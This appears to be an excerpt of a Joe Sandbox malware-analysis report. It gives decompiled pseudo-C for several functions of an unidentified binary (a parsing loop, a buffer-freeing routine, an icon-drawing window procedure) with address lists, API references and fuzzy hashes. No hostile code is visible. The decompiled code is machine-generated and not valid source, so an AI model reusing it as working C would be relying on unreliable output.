																					E00415F69( *(_t729 + 0x38),  *((intOrPtr*)(_t609 + 0xd0)), _t720);
																					E004161F4(_t609 + 0xd8, __eflags,  *(_t609 + 0x5c) + 1);
																					_t703 = 0;
																					_t566 = 0;
																					_a116 = 0;
																					_a112 = 0;
																					__eflags =  *(_t609 + 0x5c);
																					if( *(_t609 + 0x5c) <= 0) {
																						L51:
																						_t703 = _t703 >> 1;
																						 *( *((intOrPtr*)(_t609 + 0xd8)) + _t566 * 4) = _t703;
																						__eflags = _a116 - _t720;
																						if(_a116 != _t720) {
																							 *((char*)(_t729 + 0x3c)) = 1;
																						}
																						E00415EF3( &_v20);
																						goto L54;
																					} else {
																						do {
																							_a120 = _a120 & 0x00000000;
																							_t570 =  *((intOrPtr*)(_t609 + 0xd0)) + _t703;
																							_t643 = _t720 - _t703 >> 1;
																							__eflags = _t643;
																							if(_t643 != 0) {
																								while(1) {
																									_t703 = _a120;
																									__eflags =  *((short*)(_t570 + _t703 * 2));
																									if( *((short*)(_t570 + _t703 * 2)) == 0) {
																										goto L49;
																									}
																									_a120 = _a120 + 1;
																									__eflags = _a120 - _t643;
																									if(_a120 < _t643) {
																										continue;
																									}
																									goto L49;
																								}
																							}
																							L49:
																							__eflags = _a120 - _t643;
																							if(_a120 == _t643) {
																								goto L106;
																							} else {
																								goto L50;
																							}
																							goto L163;
																							L50:
																							_t571 = _a112;
																							 *( *((intOrPtr*)(_t609 + 0xd8)) + _t571 * 4) = _a116 >> 1;
																							_t566 = _t571 + 1;
																							_t703 = _a116 + 2 + _a120 * 2;
																							_a116 = _t703;
																							_a112 = _t566;
																							__eflags = _t566 -  *(_t609 + 0x5c);
																						} while (_t566 <  *(_t609 + 0x5c));
																						goto L51;
																					}
																					goto L163;
																				case 4:
																					__eax = __ebx + 0x64;
																					goto L70;
																				case 5:
																					__eax = __ebx + 0x7c;
																					goto L70;
																				case 6:
																					__eax = __ebx + 0x94;
																					goto L70;
																				case 7:
																					__eax =  &_v12;
																					__ecx = __esi;
																					_v12 = __edi;
																					_v8 = __edi;
																					_v4 = __edi;
																					E00416933(__esi, __edx, __edi, __ebp, __eflags,  *((intOrPtr*)(__ebx + 0x5c)),  &_v12) =  &_a72;
																					__ecx =  &_a8;
																					_a12 = __di;
																					__eax = E004167E7( &_a8, __edx, __ebp, __eflags, __esi,  &_a72);
																					_a120 = __edi;
																					__eflags = _a108 - __edi;
																					if(_a108 > __edi) {
																						_a116 = __edi;
																						do {
																							__edi =  *(__ebx + 0x58);
																							__eax = _v12;
																							__ecx = _a120;
																							__edi =  *(__ebx + 0x58) + _a116;
																							__al =  *((intOrPtr*)(_v12 + _a120));
																							 *((char*)(__edi + 0x13)) = __al;
																							__eflags = __al;
																							if(__al != 0) {
																								__ecx =  *((intOrPtr*)(__esi + 0x38));
																								 *((intOrPtr*)(__edi + 8)) = E004160D1( *((intOrPtr*)(__esi + 0x38)));
																							}
																							_a120 = _a120 + 1;
																							__eax = _a120;
																							_a116 = _a116 + 0x18;
																							__eflags = _a120 - _a108;
																						} while (_a120 < _a108);
																					}
																					__ecx =  &_a8;
																					__eax = E00415EF3( &_a8);
																					_push(_v12);
																					L004191B0();
																					_pop(__ecx);
																					goto L54;
																				case 8:
																					goto L83;
																				case 9:
																					__eax = __ebx + 0xac;
																					L70:
																					__ecx = __esi;
																					 &_a72 = E0041697E(__ecx, __edx, __eflags,  &_a72,  &_a72, _a108);
																					L54:
																					E004166F2(_t609 + 0x108, _t703, _a92, _a96);
																					goto L84;
																				case 0xa:
																					_a16 = __edi;
																					__eflags = _a88 - __edi;
																					if(__eflags >= 0) {
																						if(__eflags > 0) {
																							L77:
																							__ecx =  *((intOrPtr*)(__esi + 0x38));
																							__eax = E00415F52(__ecx, __edi);
																							__eflags = __al;
																							if(__al != 0) {
																								 *((char*)(__esi + 0x3c)) = 1;
																							}
																							_a16 = _a16 + 1;
																							asm("adc edi, 0x0");
																							__eflags = __edi - _a88;
																						} else {
																							__eflags = _a84 - __edi;
																							if(_a84 > __edi) {
																								goto L77;
																								do {
																									do {
																										goto L77;
																									} while (__eflags < 0);
																									if(__eflags <= 0) {
																										goto L81;
																									}
																									goto L84;
																									L81:
																									__eax = _a84;
																									__eflags = _a16 - _a84;
																								} while (_a16 < _a84);
																							}
																						}
																					}
																					L84:
																					_t643 =  *((intOrPtr*)( *(_t729 + 0x38) + 4)) -  *((intOrPtr*)( *(_t729 + 0x38) + 8));
																					__eflags = _t643;
																					if(_t643 != 0) {
																						goto L106;
																					} else {
																						E00415EF3(_t737);
																						goto L86;
																					}
																					goto L163;
																			}
																		}
																	} else {
																		__eflags = _a92 - 0x40000000;
																		if(_a92 > 0x40000000) {
																			goto L83;
																		} else {
																			goto L43;
																		}
																	}
																}
															} else {
																__eflags = _a84 - _t643;
																if(_a84 > _t643) {
																	goto L106;
																} else {
																	goto L40;
																}
															}
														}
														goto L163;
													}
													E00416087(_t641);
													__eflags = _a108 - _a124 - _a40;
													if(_a108 - _a124 != _a40) {
														E00415EDA(_t641);
													}
													_t684 = _a48;
													_t722 = 0;
													_t575 = 0;
													_a116 = 0;
													__eflags = _a124;
													if(_a124 > 0) {
														do {
															__eflags =  *((char*)(_t684 + _t575));
															if( *((char*)(_t684 + _t575)) != 0) {
																_t287 =  &_a116;
																 *_t287 = _a116 + 1;
																__eflags =  *_t287;
															}
															_t575 = _t575 + 1;
															__eflags = _t575 - _a124;
														} while (_t575 < _a124);
													}
													_a120 = _t722;
													__eflags = _a108 - _t722;
													if(__eflags > 0) {
														_t577 = _a24 - _t684;
														__eflags = _t577;
														_a112 = _t684;
														_a124 = _t722;
														_a88 = _t577;
														do {
															_t734 =  *((intOrPtr*)(_t609 + 0x58)) + _a124;
															_t578 = _a60;
															__eflags =  *((char*)(_t578 + _a120));
															_t579 = _t578 & 0xffffff00 |  *((char*)(_t578 + _a120)) == 0x00000000;
															 *(_t734 + 0x10) = _t579;
															 *((intOrPtr*)(_t734 + 0xc)) = 0;
															__eflags = _t579;
															if(_t579 == 0) {
																_t580 = _a112;
																_t712 = _a88;
																__eflags =  *(_t712 + _t580);
																 *((char*)(_t734 + 0x11)) = _t712 & 0xffffff00 |  *(_t712 + _t580) == 0x00000000;
																_t703 =  *_t580;
																_t581 = _t580 + 1;
																__eflags = _t581;
																_a96 =  *_t580;
																_a112 = _t581;
																 *_t734 = 0;
																 *((intOrPtr*)(_t734 + 4)) = 0;
																 *((char*)(_t734 + 0x12)) = 0;
															} else {
																_t584 = _a36;
																 *((char*)(_t734 + 0x11)) = 0;
																_a96 = 0;
																 *_t734 =  *((intOrPtr*)(_t584 + _t722 * 8));
																 *((intOrPtr*)(_t734 + 4)) =  *((intOrPtr*)(_t584 + 4 + _t722 * 8));
																_t586 = E0041638F( &_v44, _t722);
																 *((char*)(_t734 + 0x12)) = _t586;
																__eflags = _t586;
																if(_t586 != 0) {
																	 *((intOrPtr*)(_t734 + 0xc)) =  *((intOrPtr*)(_v32 + _t722 * 4));
																}
																_t722 = _t722 + 1;
															}
															__eflags = _a116;
															if(_a116 != 0) {
																E0041671B(_t609 + 0xc4, _a96);
															}
															_a120 = _a120 + 1;
															_a124 = _a124 + 0x18;
															__eflags = _a120 - _a108;
														} while (__eflags < 0);
													}
													_push(_a48);
													L004191B0();
													_push(_a24);
													L004191B0();
													_push(_a60);
													L004191B0();
													_t743 = _t743 + 0xc;
												}
												goto L104;
											}
										} else {
											__eflags = _t703 - _t718;
											if(__eflags != 0) {
												goto L28;
											} else {
												_push(_a124);
												_push(_a120);
												_t725 = _t609 + 0x100;
												_push(_a116);
												_t598 = E004176DE(_t729, _t703, __eflags,  *((intOrPtr*)(_t609 + 0xf0)),  *((intOrPtr*)(_t609 + 0xf4)), _t725,  &_a72, _a112);
												_a108 = _t598;
												__eflags = _t598;
												if(_t598 == 0) {
													 *_t725 =  *_t725 +  *((intOrPtr*)(_t609 + 0xf0));
													asm("adc [edi+0x4], eax");
													_t497 = E00416087( *(_t729 + 0x38));
													_t718 = 0;
													__eflags = 0;
													goto L28;
												} else {
													E0041673C( &_a72);
													_t500 = _a108;
													L105:
													__eflags =  &_a100;
													return _t500;
												}
											}
										}
									} else {
										goto L14;
									}
								}
							}
						}
						goto L163;
					}
					E00415EDA(_t618);
					goto L17;
				} else {
					L1:
					 *((intOrPtr*)(_t715 + 0x70)) =  *((intOrPtr*)(_t715 + 0x70)) +  *((intOrPtr*)(_v44 + _v52 * 8));
					asm("adc [edi+0x74], eax");
					E00414DA0( &_v148);
					_push(_a48);
					L004191B0();
					_push(_a36);
					L004191B0();
					_push(_a60);
					L004191B0();
					E004156A7( &_v52);
					_t478 = 0;
					L2:
					return _t478;
				}
				L163:
			}

0x004176de
0x004176df
0x004176e3
0x004176ea
0x004176ec
0x004176f1
0x004176f4
0x0041770d
0x00417710
0x00417713
0x00417716
0x00417719
0x0041771c
0x0041771f
0x00417722
0x00417725
0x00417728
0x00417738
0x0041773d
0x0041773f
0x00417745
0x00417797
0x004177a2
0x004177ac
0x004177af
0x004177b2
0x004177b5
0x004177b9
0x004177bb
0x00000000
0x00000000
0x004177c1
0x004177c3
0x00000000
0x004177c9
0x004177cd
0x004177d2
0x004177d4
0x004177da
0x004177dc
0x004177eb
0x004177eb
0x004177de
0x004177de
0x004177e1
0x004177e7
0x004177e7
0x004177ed
0x004177ef
0x004177f4
0x004177f4
0x0041780b
0x00417818
0x0041781f
0x0041782a
0x00417838
0x0041783d
0x00417840
0x00417842
0x00417894
0x00417897
0x004178a0
0x004178a5
0x004178a8
0x004178ad
0x004178b0
0x004178b5
0x004178b8
0x004178c3
0x004178c8
0x00000000
0x00417844
0x0041784a
0x0041784f
0x00417851
0x00417872
0x00417875
0x00417878
0x0041787b
0x0041787e
0x00417881
0x00417794
0x00000000
0x00417887
0x00417887
0x00000000
0x00417887
0x00417853
0x00417861
0x00417863
0x00417866
0x0041786b
0x0041786e
0x00417870
0x004178d0
0x004178d5
0x004178d6
0x004178d7
0x004178db
0x004178e1
0x004178e2
0x004178e3
0x004178e8
0x004178e9
0x004178ee
0x004178f1
0x004178f4
0x00417914
0x00417914
0x004178f6
0x004178f6
0x004178f8
0x004178fa
0x00417905
0x0041790d
0x0041790d
0x004178fa
0x00417916
0x00417919
0x0041791c
0x0041791f
0x00417922
0x00417984
0x00417984
0x00417987
0x0041798a
0x0041798d
0x00417990
0x00417993
0x00417996
0x00417999
0x0041799c
0x0041799f
0x004179a2
0x004179a4
0x004179a6
0x004179b1
0x004179be
0x004179c9
0x004179d1
0x004179d7
0x004179dc
0x004179dc
0x004179dc
0x004179a6
0x004179de
0x004179e1
0x004179e4
0x00417e35
0x00417e37
0x00417e3c
0x00417e3f
0x00417e44
0x00417e47
0x00417e4c
0x00417e4f
0x00417e5a
0x00417e5f
0x00417e5f
0x00000000
0x004179ea
0x004179ea
0x004179ec
0x004179fe
0x00417a01
0x00417a12
0x00417a15
0x00417a23
0x00417a28
0x00417a2b
0x00417a2d
0x00417a30
0x00417a3b
0x00417a3b
0x00417a30
0x00417a40
0x00417a45
0x00417a48
0x00417a4b
0x00417a51
0x00417a58
0x00417a5b
0x00417a5e
0x00417a61
0x00417a64
0x00417a67
0x00417a6a
0x00417d1d
0x00417d1d
0x00417d20
0x00417d25
0x00417d28
0x00417d2b
0x00417d2d
0x00417d30
0x00000000
0x00000000
0x00417a77
0x00417a7a
0x00417a80
0x00417a83
0x00417a86
0x00417a88
0x00417a8b
0x00417e6b
0x00417e6b
0x00417e72
0x00417e76
0x00417ef4
0x00417ef8
0x00417efe
0x00417f04
0x00417f0d
0x00417f0f
0x00417f12
0x00417f18
0x00417f1e
0x00417f28
0x00417f2e
0x00417f34
0x00417f37
0x00417fd6
0x00417fd6
0x00417fd6
0x00000000
0x00417f3d
0x00417f3d
0x00417f47
0x00417f47
0x00417f4e
0x00000000
0x00417f54
0x00417f54
0x00417f5b
0x00417f5e
0x00417f5e
0x00417f61
0x00417f71
0x00417f77
0x00417f79
0x00417f79
0x00417f89
0x00417f8b
0x00417f91
0x00417f94
0x00417f96
0x00417f99
0x00417f9c
0x00417fa4
0x00417fa6
0x00417fac
0x00417fb5
0x00417fbe
0x00417fc4
0x00417fc6
0x00417fe0
0x00417fe0
0x00417fee
0x00417ff1
0x00417ff3
0x00417ff5
0x00417ff8
0x00417ffa
0x00418001
0x00418001
0x00417ffc
0x00417ffc
0x00417fff
0x00418008
0x0041800b
0x00418018
0x0041801b
0x00418020
0x00418022
0x00418033
0x00418036
0x00418039
0x0041803e
0x00418041
0x00418043
0x00418043
0x00418043
0x00418048
0x0041804e
0x00418050
0x00418050
0x00418057
0x00418061
0x00418066
0x0041806b
0x0041806e
0x00418071
0x00418074
0x00418077
0x0041807c
0x0041807f
0x00418089
0x00418089
0x0041808c
0x00000000
0x0041808e
0x0041808e
0x00418090
0x00000000
0x00418092
0x00418092
0x00418098
0x0041809b
0x0041809d
0x004180b7
0x004180bc
0x004180bf
0x004180c1
0x004180db
0x004180de
0x004180f5
0x004180f9
0x00000000
0x004180ff
0x00418102
0x00418110
0x00418115
0x00418118
0x0041811d
0x00418120
0x00000000
0x00418126
0x00418126
0x00418128
0x00000000
0x00000000
0x00000000
0x00000000
0x00418128
0x00418120
0x004180e0
0x004180e3
0x004180eb
0x00000000
0x004180eb
0x004180c3
0x004180c6
0x004180ce
0x004180d3
0x00000000
0x004180d3
0x004180c1
0x00418090
0x00418081
0x00418081
0x00418083
0x0041812e
0x0041812e
0x00418131
0x00418138
0x0041813e
0x00418141
0x00418147
0x0041814a
0x0041814d
0x00418150
0x00418156
0x00418160
0x00418168
0x0041816d
0x00418170
0x00418176
0x00000000
0x00000000
0x00000000
0x00418083
0x00418024
0x00418024
0x00418026
0x00418026
0x00418029
0x0041802f
0x0041802f
0x00000000
0x00000000
0x00000000
0x00417fff
0x00417ffa
0x00417fc8
0x00417fc8
0x00417fcf
0x00417fcf
0x00000000
0x00417fca
0x00417fca
0x00417fcd
0x00000000
0x00000000
0x00000000
0x00000000
0x00417fcd
0x00417fc8
0x00417f63
0x00417f63
0x00417f66
0x00417fd8
0x00417fd8
0x00417fd8
0x00417f68
0x00417f68
0x00417f68
0x00417f66
0x00417f56
0x00417f56
0x00417f59
0x00000000
0x00000000
0x00000000
0x00000000
0x00417f59
0x00417f54
0x00417f3f
0x00417f3f
0x00417f41
0x00000000
0x00000000
0x00000000
0x00000000
0x00417f41
0x00417f3d
0x00417e78
0x00417e78
0x00417e79
0x00417e79
0x00417e79
0x00417e7f
0x00417ec2
0x00417ec3
0x00417ec9
0x00000000
0x00417e81
0x00417e81
0x00417e81
0x00417e81
0x00417e87
0x00417eca
0x00417eca
0x00417eca
0x00417ecb
0x00417ecc
0x00000000
0x00417e89
0x00417e89
0x00417e89
0x00417e89
0x00417e8f
0x00417ed2
0x00417ed2
0x00417ed5
0x00417ed5
0x00000000
0x00417e91
0x00417e91
0x00417e91
0x00417e93
0x00417ed6
0x00417ed6
0x00000000
0x00417e95
0x00417e95
0x00417e95
0x00417e97
0x00417eda
0x00417eda
0x00417edc
0x00417ede
0x00417edf
0x00417ee1
0x00417ee1
0x00417e99
0x00417e99
0x00417e99
0x00417e99
0x00417e9f
0x00417ea1
0x00417ea1
0x00417ea1
0x00417ea2
0x00417ea3
0x00417ea5
0x00417ea8
0x00417ea9
0x00417eaa
0x00417eab
0x00417eae
0x00417eb2
0x00417eba
0x00417ec0
0x00000000
0x00417ec0
0x00417e9f
0x00417e97
0x00417e93
0x00417e8f
0x00417e87
0x00417ee2
0x00417ee4
0x00417ee6
0x00417ee8
0x00417ee8
0x00417ee8
0x00417ee8
0x00417fdd
0x00417a91
0x00417a91
0x00417a9c
0x00417aa1
0x00417aa6
0x00417aaf
0x00417ab4
0x00417ab6
0x00417ab9
0x00417cf6
0x00417cf6
0x00417d03
0x00000000
0x00417abf
0x00417abf
0x00417ace
0x00417ad1
0x00417ad4
0x00417ad7
0x00000000
0x00417add
0x00417add
0x00000000
0x00417c39
0x00417c40
0x00417c42
0x00417c47
0x00417c49
0x00417c4c
0x00417c4f
0x00417c51
0x00417c51
0x00417c54
0x00417c58
0x00417c5a
0x00417c5a
0x00417c5a
0x00417c5a
0x00417c5d
0x00417c5e
0x00417c5e
0x00417c51
0x00417c63
0x00417c69
0x00417c71
0x00000000
0x00000000
0x00417c7b
0x00000000
0x00000000
0x00417c8e
0x00417c7e
0x00417c82
0x00417c84
0x00000000
0x00000000
0x00417aec
0x00417af0
0x00417afb
0x00417b05
0x00417b14
0x00417b24
0x00417b29
0x00417b2b
0x00417b2d
0x00417b30
0x00417b33
0x00417b36
0x00417b8e
0x00417b94
0x00417b96
0x00417b99
0x00417b9c
0x00417b9e
0x00417b9e
0x00417ba5
0x00000000
0x00417b38
0x00417b38
0x00417b3e
0x00417b46
0x00417b48
0x00417b48
0x00417b4a
0x00417b4c
0x00417b4c
0x00417b4f
0x00417b54
0x00000000
0x00000000
0x00417b56
0x00417b59
0x00417b5c
0x00000000
0x00000000
0x00000000
0x00417b5c
0x00417b4c
0x00417b5e
0x00417b5e
0x00417b61
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00417b67
0x00417b6a
0x00417b75
0x00417b7e
0x00417b7f
0x00417b83
0x00417b86
0x00417b89
0x00417b89
0x00000000
0x00417b38
0x00000000
0x00000000
0x00417cad
0x00000000
0x00000000
0x00417cb2
0x00000000
0x00000000
0x00417cb7
0x00000000
0x00000000
0x00417bc0
0x00417bc7
0x00417bc9
0x00417bcc
0x00417bcf
0x00417bd7
0x00417bdc
0x00417bdf
0x00417be3
0x00417be8
0x00417beb
0x00417bee
0x00417bf0
0x00417bf3
0x00417bf3
0x00417bf6
0x00417bf9
0x00417bfc
0x00417bff
0x00417c02
0x00417c05
0x00417c07
0x00417c09
0x00417c11
0x00417c11
0x00417c14
0x00417c17
0x00417c1a
0x00417c1e
0x00417c1e
0x00417bf3
0x00417c23
0x00417c26
0x00417c2b
0x00417c2e
0x00417c33
0x00000000
0x00000000
0x00000000
0x00000000
0x00417c93
0x00417c99
0x00417c9c
0x00417ca3
0x00417baa
0x00417bb6
0x00000000
0x00000000
0x00417cbf
0x00417cc2
0x00417cc5
0x00417cc7
0x00417cce
0x00417cce
0x00417cd1
0x00417cd6
0x00417cd8
0x00417cda
0x00417cda
0x00417cde
0x00417ce2
0x00417ce5
0x00417cc9
0x00417cc9
0x00417ccc
0x00000000
0x00417cce
0x00417cce
0x00000000
0x00000000
0x00417cea
0x00000000
0x00000000
0x00000000
0x00417cec
0x00417cec
0x00417cef
0x00417cef
0x00417cf4
0x00417ccc
0x00417cc7
0x00417d06
0x00417d0c
0x00417d0c
0x00417d0f
0x00000000
0x00417d15
0x00417d18
0x00000000
0x00417d18
0x00000000
0x00000000
0x00417add
0x00417ac1
0x00417ac1
0x00417ac8
0x00000000
0x00000000
0x00000000
0x00000000
0x00417ac8
0x00417abf
0x00417a93
0x00417a93
0x00417a96
0x00000000
0x00000000
0x00000000
0x00000000
0x00417a96
0x00417a91
0x00000000
0x00417a8b
0x00417d36
0x00417d41
0x00417d44
0x00417d46
0x00417d46
0x00417d4b
0x00417d4e
0x00417d50
0x00417d52
0x00417d55
0x00417d58
0x00417d5a
0x00417d5a
0x00417d5e
0x00417d60
0x00417d60
0x00417d60
0x00417d60
0x00417d63
0x00417d64
0x00417d64
0x00417d5a
0x00417d69
0x00417d6c
0x00417d6f
0x00417d78
0x00417d78
0x00417d7a
0x00417d7d
0x00417d80
0x00417d83
0x00417d86
0x00417d89
0x00417d8f
0x00417d93
0x00417d98
0x00417d9b
0x00417d9e
0x00417da0
0x00417dd3
0x00417dd6
0x00417dd9
0x00417ddf
0x00417de2
0x00417de4
0x00417de4
0x00417de5
0x00417de8
0x00417deb
0x00417ded
0x00417df0
0x00417da2
0x00417da2
0x00417da5
0x00417da8
0x00417dae
0x00417db8
0x00417dbb
0x00417dc0
0x00417dc3
0x00417dc5
0x00417dcd
0x00417dcd
0x00417dd0
0x00417dd0
0x00417df3
0x00417df7
0x00417e02
0x00417e02
0x00417e07
0x00417e0d
0x00417e11
0x00417e11
0x00417d83
0x00417e1a
0x00417e1d
0x00417e22
0x00417e25
0x00417e2a
0x00417e2d
0x00417e32
0x00417e32
0x00000000
0x004179ec
0x00417924
0x00417924
0x00417926
0x00000000
0x00417928
0x00417928
0x0041792e
0x00417931
0x00417937
0x0041794d
0x00417952
0x00417955
0x00417957
0x0041796f
0x00417977
0x0041797d
0x00417982
0x00417982
0x00000000
0x00417959
0x0041795c
0x00417961
0x00417e61
0x00417e64
0x00417e68
0x00417e68
0x00417957
0x00417926
0x00000000
0x00000000
0x00000000
0x00417870
0x00417851
0x00417842
0x00000000
0x004177c3
0x0041788f
0x00000000
0x00417747
0x00417747
0x00417750
0x0041775d
0x00417760
0x00417765
0x00417768
0x0041776d
0x00417770
0x00417775
0x00417778
0x00417783
0x00417788
0x0041778a
0x00417791
0x00417791
0x00000000

APIs

??3@YAXPAX@Z.MSVCRT ref: 00417768
??3@YAXPAX@Z.MSVCRT ref: 00417770
??3@YAXPAX@Z.MSVCRT ref: 00417778

Part of subcall function 004156A7: ??3@YAXPAX@Z.MSVCRT ref: 004156AD
Part of subcall function 004156A7: ??3@YAXPAX@Z.MSVCRT ref: 004156B5
Part of subcall function 004156A7: ??3@YAXPAX@Z.MSVCRT ref: 004156BD
Part of subcall function 004156A7: ??3@YAXPAX@Z.MSVCRT ref: 004156C5
Part of subcall function 004156A7: ??3@YAXPAX@Z.MSVCRT ref: 004156CD
Part of subcall function 004156A7: ??3@YAXPAX@Z.MSVCRT ref: 004156D5
Part of subcall function 004156A7: ??3@YAXPAX@Z.MSVCRT ref: 004156DD
Part of subcall function 004156A7: ??3@YAXPAX@Z.MSVCRT ref: 004156E5
Part of subcall function 004156A7: ??3@YAXPAX@Z.MSVCRT ref: 004156ED
Part of subcall function 004156A7: ??3@YAXPAX@Z.MSVCRT ref: 004156F5
Part of subcall function 004156A7: ??3@YAXPAX@Z.MSVCRT ref: 004156FD

??2@YAPAXI@Z.MSVCRT ref: 004177D4

Part of subcall function 00414DA0: ??3@YAXPAX@Z.MSVCRT ref: 00414DB3

Memory Dump Source

Source File: 00000000.00000002.281234864.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.281228991.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.281248703.000000000041A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.281255068.000000000041E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.281261332.0000000000423000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_32_64_ver_2_bit.jbxd

Similarity

API ID: ??3@$??2@
String ID:
API String ID: 4113381792-0
Opcode ID: fa8d8c48c67b27db8a0f29f59b7108420aa6858e64b5bade0ae738c662bd56b0
Instruction ID: e009749836a5b8c521700d779fd130da81b0f30b20586917bece67503c0bf7cf
Opcode Fuzzy Hash: fa8d8c48c67b27db8a0f29f59b7108420aa6858e64b5bade0ae738c662bd56b0
Instruction Fuzzy Hash: 91F117719002499FCB25DF69C8809EE7BF6BF48344F14406EF81997262DB39E985CF58

Uniqueness

Uniqueness Score: -1.00%

Function 00415AA4, Relevance: 18.0, APIs: 12, Instructions: 32
COMMON

Download Yara Rule

C-Code - Quality: 37%

			E00415AA4(void* __ecx) {
				void* _t24;

				_push( *((intOrPtr*)(__ecx + 0xd8)));
				L004191B0();
				_push( *((intOrPtr*)(__ecx + 0xd0)));
				L004191B0();
				_push( *((intOrPtr*)(__ecx + 0xc4)));
				L004191B0();
				_push( *((intOrPtr*)(__ecx + 0xb8)));
				L004191B0();
				_push( *((intOrPtr*)(__ecx + 0xac)));
				L004191B0();
				_push( *((intOrPtr*)(__ecx + 0xa0)));
				L004191B0();
				_push( *((intOrPtr*)(__ecx + 0x94)));
				L004191B0();
				_push( *((intOrPtr*)(__ecx + 0x88)));
				L004191B0();
				_push( *((intOrPtr*)(__ecx + 0x7c)));
				L004191B0();
				_push( *((intOrPtr*)(__ecx + 0x70)));
				L004191B0();
				_push( *((intOrPtr*)(__ecx + 0x64)));
				L004191B0();
				_push( *((intOrPtr*)(__ecx + 0x58)));
				L004191B0();
				_pop(_t30);
				_push( *((intOrPtr*)(__ecx + 0x4c)));
				L004191B0();
				_push( *((intOrPtr*)(__ecx + 0x3c)));
				L004191B0();
				_push( *((intOrPtr*)(__ecx + 0x38)));
				L004191B0();
				_push( *((intOrPtr*)(__ecx + 0x34)));
				L004191B0();
				_push( *((intOrPtr*)(__ecx + 0x30)));
				L004191B0();
				_push( *((intOrPtr*)(__ecx + 0x2c)));
				L004191B0();
				_push( *((intOrPtr*)(__ecx + 0x28)));
				L004191B0();
				_push( *((intOrPtr*)(__ecx + 0x24)));
				L004191B0();
				_push( *((intOrPtr*)(__ecx + 0x18)));
				L004191B0();
				_push( *((intOrPtr*)(__ecx + 0xc)));
				L004191B0();
				_push( *((intOrPtr*)(__ecx + 8)));
				L004191B0();
				return _t24;
			}

0x00415aa8
0x00415aae
0x00415ab3
0x00415ab9
0x00415abe
0x00415ac4
0x00415ac9
0x00415acf
0x00415ad4
0x00415ada
0x00415adf
0x00415ae5
0x00415aea
0x00415af0
0x00415af5
0x00415afb
0x00415b00
0x00415b03
0x00415b08
0x00415b0b
0x00415b10
0x00415b13
0x00415b18
0x00415b1b
0x00415b26
0x004156aa
0x004156ad
0x004156b2
0x004156b5
0x004156ba
0x004156bd
0x004156c2
0x004156c5
0x004156ca
0x004156cd
0x004156d2
0x004156d5
0x004156da
0x004156dd
0x004156e2
0x004156e5
0x004156ea
0x004156ed
0x004156f2
0x004156f5
0x004156fa
0x004156fd
0x00415706

APIs

??3@YAXPAX@Z.MSVCRT ref: 00415AAE
??3@YAXPAX@Z.MSVCRT ref: 00415AB9
??3@YAXPAX@Z.MSVCRT ref: 00415AC4
??3@YAXPAX@Z.MSVCRT ref: 00415ACF
??3@YAXPAX@Z.MSVCRT ref: 00415ADA
??3@YAXPAX@Z.MSVCRT ref: 00415AE5
??3@YAXPAX@Z.MSVCRT ref: 00415AF0
??3@YAXPAX@Z.MSVCRT ref: 00415AFB
??3@YAXPAX@Z.MSVCRT ref: 00415B03
??3@YAXPAX@Z.MSVCRT ref: 00415B0B
??3@YAXPAX@Z.MSVCRT ref: 00415B13
??3@YAXPAX@Z.MSVCRT ref: 00415B1B

Memory Dump Source

Source File: 00000000.00000002.281234864.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.281228991.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.281248703.000000000041A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.281255068.000000000041E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.281261332.0000000000423000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_32_64_ver_2_bit.jbxd

Similarity

API ID: ??3@
String ID:
API String ID: 613200358-0
Opcode ID: e68277fbd99c3745330440203d9bef5d83ad1bd86ee1276d15dbf0581265652b
Instruction ID: aedf86548abd3be3b1bfa100c5c76d75fd36fa784b4736098e5a7a93d74d5829
Opcode Fuzzy Hash: e68277fbd99c3745330440203d9bef5d83ad1bd86ee1276d15dbf0581265652b
Instruction Fuzzy Hash: 29F05930110A11BAE6123732DC1ABDAB6B7AF40304F04442FF59B50435CB557CD1D75D

Uniqueness

Uniqueness Score: -1.00%

Function 00408190, Relevance: 16.6, APIs: 11, Instructions: 88
windowCOMMON

Download Yara Rule

C-Code - Quality: 88%

			E00408190(void* __edx, long _a4, int _a8, int _a12, int _a16) {
				struct tagRECT _v20;
				_Unknown_base(*)()* _t29;
				int _t34;
				struct HWND__* _t55;
				void* _t56;
				long _t57;
				struct HDC__* _t61;

				_t56 = __edx;
				_t55 = _a4;
				_t57 = GetWindowLongW(GetParent(_t55), 0xffffffeb);
				if(_t57 != 0) {
					_t29 =  *(_t57 + 0x54);
					_a4 = _a4 & 0x00000000;
					if(_t29 != 0) {
						_a4 = CallWindowProcW(_t29, _t55, _a8, _a12, _a16);
					}
					_a12 = GetSystemMetrics(0x31);
					_a16 = GetSystemMetrics(0x32);
					_t34 = _a8;
					if(_t34 == 0) {
						SetWindowLongW(_t55, 0xfffffffc,  *(_t57 + 0x54));
					} else {
						if(_t34 == 0xd) {
							_t61 = GetWindowDC(_t55);
							GetWindowRect(_t55,  &_v20);
							asm("cdq");
							asm("cdq");
							DrawIconEx(_t61, _v20.right - _v20.left - _a12 - _t56 >> 1, _v20.bottom - _v20.top - _a16 - _t56 >> 1,  *(_t57 + 0x50), _a12, _a16, 0, 0, 3);
							ReleaseDC(_t55, _t61);
						}
					}
					return _a4;
				}
				return DefWindowProcW(_t55, _a8, _a12, _a16);
			}

0x00408190
0x00408197
0x004081ab
0x004081af
0x004081c6
0x004081c9
0x004081cf
0x004081e2
0x004081e2
0x004081f2
0x004081f7
0x004081fe
0x004081ff
0x0040825e
0x00408201
0x00408204
0x0040820d
0x00408214
0x0040822c
0x00408241
0x00408248
0x00408250
0x00408250
0x00408204
0x00000000
0x00408267
0x00000000

APIs

GetParent.USER32(?), ref: 0040819E
GetWindowLongW.USER32(00000000), ref: 004081A5
DefWindowProcW.USER32(?,?,?,?), ref: 004081BB
CallWindowProcW.USER32(?,?,?,?,?), ref: 004081DC
GetSystemMetrics.USER32 ref: 004081EE
GetSystemMetrics.USER32 ref: 004081F5
GetWindowDC.USER32(?), ref: 00408207
GetWindowRect.USER32 ref: 00408214
DrawIconEx.USER32 ref: 00408248
